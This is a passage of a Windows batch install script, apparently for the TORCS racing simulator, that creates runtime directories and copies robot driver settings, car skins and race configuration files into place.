if exist .\src\drivers\inferno2\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\5
if exist .\src\drivers\inferno2\5\defaultcar.xml copy .\src\drivers\inferno2\5\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\5\defaultcar.xml
if exist .\src\drivers\inferno2\5\default.xml copy .\src\drivers\inferno2\5\default.xml .\%RUNTIMEDIR%\drivers\inferno2\5\default.xml
if exist .\src\drivers\inferno2\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\6
if exist .\src\drivers\inferno2\6\defaultcar.xml copy .\src\drivers\inferno2\6\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\6\defaultcar.xml
if exist .\src\drivers\inferno2\6\default.xml copy .\src\drivers\inferno2\6\default.xml .\%RUNTIMEDIR%\drivers\inferno2\6\default.xml
if exist .\src\drivers\inferno2\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\7
if exist .\src\drivers\inferno2\7\defaultcar.xml copy .\src\drivers\inferno2\7\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\7\defaultcar.xml
if exist .\src\drivers\inferno2\7\default.xml copy .\src\drivers\inferno2\7\default.xml .\%RUNTIMEDIR%\drivers\inferno2\7\default.xml
if exist .\src\drivers\inferno2\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\8
if exist .\src\drivers\inferno2\8\defaultcar.xml copy .\src\drivers\inferno2\8\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\8\defaultcar.xml
if exist .\src\drivers\inferno2\8\default.xml copy .\src\drivers\inferno2\8\default.xml .\%RUNTIMEDIR%\drivers\inferno2\8\default.xml
if exist .\src\drivers\inferno2\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\9
if exist .\src\drivers\inferno2\9\defaultcar.xml copy .\src\drivers\inferno2\9\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\9\defaultcar.xml
if exist .\src\drivers\inferno2\9\default.xml copy .\src\drivers\inferno2\9\default.xml .\%RUNTIMEDIR%\drivers\inferno2\9\default.xml
if exist .\src\drivers\inferno2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\inferno2.xml copy .\src\drivers\inferno2\inferno2.xml .\%RUNTIMEDIR%\drivers\inferno2\inferno2.xml
if exist .\src\drivers\inferno2\logo.rgb copy .\src\drivers\inferno2\logo.rgb .\%RUNTIMEDIR%\drivers\inferno2\logo.rgb
if exist .\src\drivers\sparkle\0\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\sparkle\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\sparkle\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\sparkle
if exist .\src\drivers\sparkle\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\sparkle\0
if exist .\src\drivers\sparkle\0\baja-bug.rgb copy .\src\drivers\sparkle\0\baja-bug.rgb .\%RUNTIMEDIR%\drivers\sparkle\0\baja-bug.rgb
if exist .\src\drivers\sparkle\0\default.xml copy .\src\drivers\sparkle\0\default.xml .\%RUNTIMEDIR%\drivers\sparkle\0\default.xml
if exist .\src\drivers\sparkle\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\sparkle\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\sparkle\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\sparkle
if exist .\src\drivers\sparkle\sparkle.xml copy .\src\drivers\sparkle\sparkle.xml .\%RUNTIMEDIR%\drivers\sparkle\sparkle.xml
if exist .\src\drivers\sparkle\logo.rgb copy .\src\drivers\sparkle\logo.rgb .\%RUNTIMEDIR%\drivers\sparkle\logo.rgb
if exist .\src\drivers\tita\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\1
if exist .\src\drivers\tita\1\default.xml copy .\src\drivers\tita\1\default.xml .\%RUNTIMEDIR%\drivers\tita\1\default.xml
if exist .\src\drivers\tita\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\10
if exist .\src\drivers\tita\10\default.xml copy .\src\drivers\tita\10\default.xml .\%RUNTIMEDIR%\drivers\tita\10\default.xml
if exist .\src\drivers\tita\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\2
if exist .\src\drivers\tita\2\default.xml copy .\src\drivers\tita\2\default.xml .\%RUNTIMEDIR%\drivers\tita\2\default.xml
if exist .\src\drivers\tita\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\3
if exist .\src\drivers\tita\3\default.xml copy .\src\drivers\tita\3\default.xml .\%RUNTIMEDIR%\drivers\tita\3\default.xml
if exist .\src\drivers\tita\3\car1-trb1.rgb copy .\src\drivers\tita\3\car1-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\3\car1-trb1.rgb
if exist .\src\drivers\tita\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\4
if exist .\src\drivers\tita\4\default.xml copy .\src\drivers\tita\4\default.xml .\%RUNTIMEDIR%\drivers\tita\4\default.xml
if exist .\src\drivers\tita\4\car2-trb1.rgb copy .\src\drivers\tita\4\car2-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\4\car2-trb1.rgb
if exist .\src\drivers\tita\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\5
if exist .\src\drivers\tita\5\default.xml copy .\src\drivers\tita\5\default.xml .\%RUNTIMEDIR%\drivers\tita\5\default.xml
if exist .\src\drivers\tita\5\car3-trb1.rgb copy .\src\drivers\tita\5\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\5\car3-trb1.rgb
if exist .\src\drivers\tita\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\6
if exist .\src\drivers\tita\6\default.xml copy .\src\drivers\tita\6\default.xml .\%RUNTIMEDIR%\drivers\tita\6\default.xml
if exist .\src\drivers\tita\6\car4-trb1.rgb copy .\src\drivers\tita\6\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\6\car4-trb1.rgb
if exist .\src\drivers\tita\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\7
if exist .\src\drivers\tita\7\default.xml copy .\src\drivers\tita\7\default.xml .\%RUNTIMEDIR%\drivers\tita\7\default.xml
if exist .\src\drivers\tita\7\car5-trb1.rgb copy .\src\drivers\tita\7\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\7\car5-trb1.rgb
if exist .\src\drivers\tita\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\8
if exist .\src\drivers\tita\8\default.xml copy .\src\drivers\tita\8\default.xml .\%RUNTIMEDIR%\drivers\tita\8\default.xml
if exist .\src\drivers\tita\8\car6-trb1.rgb copy .\src\drivers\tita\8\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\8\car6-trb1.rgb
if exist .\src\drivers\tita\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\9
if exist .\src\drivers\tita\9\default.xml copy .\src\drivers\tita\9\default.xml .\%RUNTIMEDIR%\drivers\tita\9\default.xml
if exist .\src\drivers\tita\9\car7-trb1.rgb copy .\src\drivers\tita\9\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\9\car7-trb1.rgb
if exist .\src\drivers\tita\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\tita.xml copy .\src\drivers\tita\tita.xml .\%RUNTIMEDIR%\drivers\tita\tita.xml
if exist .\src\drivers\tita\logo.rgb copy .\src\drivers\tita\logo.rgb .\%RUNTIMEDIR%\drivers\tita\logo.rgb
if exist .\src\drivers\lliaw\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\1
if exist .\src\drivers\lliaw\1\default.xml copy .\src\drivers\lliaw\1\default.xml .\%RUNTIMEDIR%\drivers\lliaw\1\default.xml
if exist .\src\drivers\lliaw\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\10
if exist .\src\drivers\lliaw\10\default.xml copy .\src\drivers\lliaw\10\default.xml .\%RUNTIMEDIR%\drivers\lliaw\10\default.xml
if exist .\src\drivers\lliaw\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\2
if exist .\src\drivers\lliaw\2\default.xml copy .\src\drivers\lliaw\2\default.xml .\%RUNTIMEDIR%\drivers\lliaw\2\default.xml
if exist .\src\drivers\lliaw\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\3
if exist .\src\drivers\lliaw\3\default.xml copy .\src\drivers\lliaw\3\default.xml .\%RUNTIMEDIR%\drivers\lliaw\3\default.xml
if exist .\src\drivers\lliaw\3\car1-trb1.rgb copy .\src\drivers\lliaw\3\car1-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\3\car1-trb1.rgb
if exist .\src\drivers\lliaw\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\4
if exist .\src\drivers\lliaw\4\default.xml copy .\src\drivers\lliaw\4\default.xml .\%RUNTIMEDIR%\drivers\lliaw\4\default.xml
if exist .\src\drivers\lliaw\4\car2-trb1.rgb copy .\src\drivers\lliaw\4\car2-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\4\car2-trb1.rgb
if exist .\src\drivers\lliaw\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\5
if exist .\src\drivers\lliaw\5\default.xml copy .\src\drivers\lliaw\5\default.xml .\%RUNTIMEDIR%\drivers\lliaw\5\default.xml
if exist .\src\drivers\lliaw\5\car3-trb1.rgb copy .\src\drivers\lliaw\5\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\5\car3-trb1.rgb
if exist .\src\drivers\lliaw\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\6
if exist .\src\drivers\lliaw\6\default.xml copy .\src\drivers\lliaw\6\default.xml .\%RUNTIMEDIR%\drivers\lliaw\6\default.xml
if exist .\src\drivers\lliaw\6\car4-trb1.rgb copy .\src\drivers\lliaw\6\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\6\car4-trb1.rgb
if exist .\src\drivers\lliaw\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\7
if exist .\src\drivers\lliaw\7\default.xml copy .\src\drivers\lliaw\7\default.xml .\%RUNTIMEDIR%\drivers\lliaw\7\default.xml
if exist .\src\drivers\lliaw\7\car5-trb1.rgb copy .\src\drivers\lliaw\7\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\7\car5-trb1.rgb
if exist .\src\drivers\lliaw\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\8
if exist .\src\drivers\lliaw\8\default.xml copy .\src\drivers\lliaw\8\default.xml .\%RUNTIMEDIR%\drivers\lliaw\8\default.xml
if exist .\src\drivers\lliaw\8\car6-trb1.rgb copy .\src\drivers\lliaw\8\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\8\car6-trb1.rgb
if exist .\src\drivers\lliaw\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\9
if exist .\src\drivers\lliaw\9\default.xml copy .\src\drivers\lliaw\9\default.xml .\%RUNTIMEDIR%\drivers\lliaw\9\default.xml
if exist .\src\drivers\lliaw\9\car7-trb1.rgb copy .\src\drivers\lliaw\9\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\9\car7-trb1.rgb
if exist .\src\drivers\lliaw\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\lliaw.xml copy .\src\drivers\lliaw\lliaw.xml .\%RUNTIMEDIR%\drivers\lliaw\lliaw.xml
if exist .\src\drivers\lliaw\logo.rgb copy .\src\drivers\lliaw\logo.rgb .\%RUNTIMEDIR%\drivers\lliaw\logo.rgb
if exist .\src\drivers\olethros\0\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\0
if exist .\src\drivers\olethros\0\default.xml copy .\src\drivers\olethros\0\default.xml .\%RUNTIMEDIR%\drivers\olethros\0\default.xml
if exist .\src\drivers\olethros\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\1
if exist .\src\drivers\olethros\1\default.xml copy .\src\drivers\olethros\1\default.xml .\%RUNTIMEDIR%\drivers\olethros\1\default.xml
if exist .\src\drivers\olethros\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\2
if exist .\src\drivers\olethros\2\default.xml copy .\src\drivers\olethros\2\default.xml .\%RUNTIMEDIR%\drivers\olethros\2\default.xml
if exist .\src\drivers\olethros\2\car1-trb1.rgb copy .\src\drivers\olethros\2\car1-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\2\car1-trb1.rgb
if exist .\src\drivers\olethros\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\3
if exist .\src\drivers\olethros\3\default.xml copy .\src\drivers\olethros\3\default.xml .\%RUNTIMEDIR%\drivers\olethros\3\default.xml
if exist .\src\drivers\olethros\3\car2-trb1.rgb copy .\src\drivers\olethros\3\car2-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\3\car2-trb1.rgb
if exist .\src\drivers\olethros\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\4
if exist .\src\drivers\olethros\4\default.xml copy .\src\drivers\olethros\4\default.xml .\%RUNTIMEDIR%\drivers\olethros\4\default.xml
if exist .\src\drivers\olethros\4\car3-trb1.rgb copy .\src\drivers\olethros\4\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\4\car3-trb1.rgb
if exist .\src\drivers\olethros\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\5
if exist .\src\drivers\olethros\5\default.xml copy .\src\drivers\olethros\5\default.xml .\%RUNTIMEDIR%\drivers\olethros\5\default.xml
if exist .\src\drivers\olethros\5\car4-trb1.rgb copy .\src\drivers\olethros\5\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\5\car4-trb1.rgb
if exist .\src\drivers\olethros\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\6
if exist .\src\drivers\olethros\6\default.xml copy .\src\drivers\olethros\6\default.xml .\%RUNTIMEDIR%\drivers\olethros\6\default.xml
if exist .\src\drivers\olethros\6\car5-trb1.rgb copy .\src\drivers\olethros\6\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\6\car5-trb1.rgb
if exist .\src\drivers\olethros\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\7
if exist .\src\drivers\olethros\7\default.xml copy .\src\drivers\olethros\7\default.xml .\%RUNTIMEDIR%\drivers\olethros\7\default.xml
if exist .\src\drivers\olethros\7\car6-trb1.rgb copy .\src\drivers\olethros\7\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\7\car6-trb1.rgb
if exist .\src\drivers\olethros\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\8
if exist .\src\drivers\olethros\8\default.xml copy .\src\drivers\olethros\8\default.xml .\%RUNTIMEDIR%\drivers\olethros\8\default.xml
if exist .\src\drivers\olethros\8\car7-trb1.rgb copy .\src\drivers\olethros\8\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\8\car7-trb1.rgb
if exist .\src\drivers\olethros\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\9
if exist .\src\drivers\olethros\9\default.xml copy .\src\drivers\olethros\9\default.xml .\%RUNTIMEDIR%\drivers\olethros\9\default.xml
if exist .\src\drivers\olethros\9\car1-trb3.rgb copy .\src\drivers\olethros\9\car1-trb3.rgb .\%RUNTIMEDIR%\drivers\olethros\9\car1-trb3.rgb
if exist .\src\drivers\olethros\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\olethros.xml copy .\src\drivers\olethros\olethros.xml .\%RUNTIMEDIR%\drivers\olethros\olethros.xml
if exist .\src\drivers\olethros\logo.rgb copy .\src\drivers\olethros\logo.rgb .\%RUNTIMEDIR%\drivers\olethros\logo.rgb
if exist .\src\libs\raceengineclient\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\libs\raceengineclient\*.* call .\create_dir .\%RUNTIMEDIR%\config
if exist .\src\libs\raceengineclient\raceengine.xml copy .\src\libs\raceengineclient\raceengine.xml .\%RUNTIMEDIR%\config\raceengine.xml
if exist .\src\libs\raceengineclient\style.xsl copy .\src\libs\raceengineclient\style.xsl .\%RUNTIMEDIR%\config\style.xsl
if exist .\src\libs\tgf\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\libs\tgf\*.* call .\create_dir .\%RUNTIMEDIR%\config
if exist .\src\libs\tgf\params.dtd copy .\src\libs\tgf\params.dtd .\%RUNTIMEDIR%\config\params.dtd
if exist .\src\libs\tgfclient\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\libs\tgfclient\*.* call .\create_dir .\%RUNTIMEDIR%\config
if exist .\src\libs\tgfclient\screen.xml copy .\src\libs\tgfclient\screen.xml .\%RUNTIMEDIR%\config\screen.xml
if exist .\src\modules\graphic\ssggraph\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\modules\graphic\ssggraph\*.* call .\create_dir .\%RUNTIMEDIR%\config
if exist .\src\modules\graphic\ssggraph\graph.xml copy .\src\modules\graphic\ssggraph\graph.xml .\%RUNTIMEDIR%\config\graph.xml
if exist .\src\modules\graphic\ssggraph\sound.xml copy .\src\modules\graphic\ssggraph\sound.xml .\%RUNTIMEDIR%\config\sound.xml
if exist .\src\modules\telemetry\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\modules\telemetry\*.* call .\create_dir .\%RUNTIMEDIR%\telemetry
if exist .\src\modules\telemetry\telemetry.sh copy .\src\modules\telemetry\telemetry.sh .\%RUNTIMEDIR%\telemetry\telemetry.sh
if exist .\src\raceman\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\raceman\*.* call .\create_dir .\%RUNTIMEDIR%\config
if exist .\src\raceman\*.* call .\create_dir .\%RUNTIMEDIR%\config\raceman
if exist .\src\raceman\champ.xml copy .\src\raceman\champ.xml .\%RUNTIMEDIR%\config\raceman\champ.xml
if exist .\src\raceman\dtmrace.xml copy .\src\raceman\dtmrace.xml .\%RUNTIMEDIR%\config\raceman\dtmrace.xml
if exist .\src\raceman\endrace.xml copy .\src\raceman\endrace.xml .\%RUNTIMEDIR%\config\raceman\endrace.xml
if exist .\src\raceman\ncrace.xml copy .\src\raceman\ncrace.xml .\%RUNTIMEDIR%\config\raceman\ncrace.xml
if exist .\src\raceman\practice.xml copy .\src\raceman\practice.xml .\%RUNTIMEDIR%\config\raceman\practice.xml
if exist .\src\raceman\quickrace.xml copy .\src\raceman\quickrace.xml .\%RUNTIMEDIR%\config\raceman\quickrace.xml
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\results
call .\create_dir .\%RUNTIMEDIR%\results\champ
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\results
call .\create_dir .\%RUNTIMEDIR%\results\dtmrace
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\results
call .\create_dir .\%RUNTIMEDIR%\results\endrace
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\results
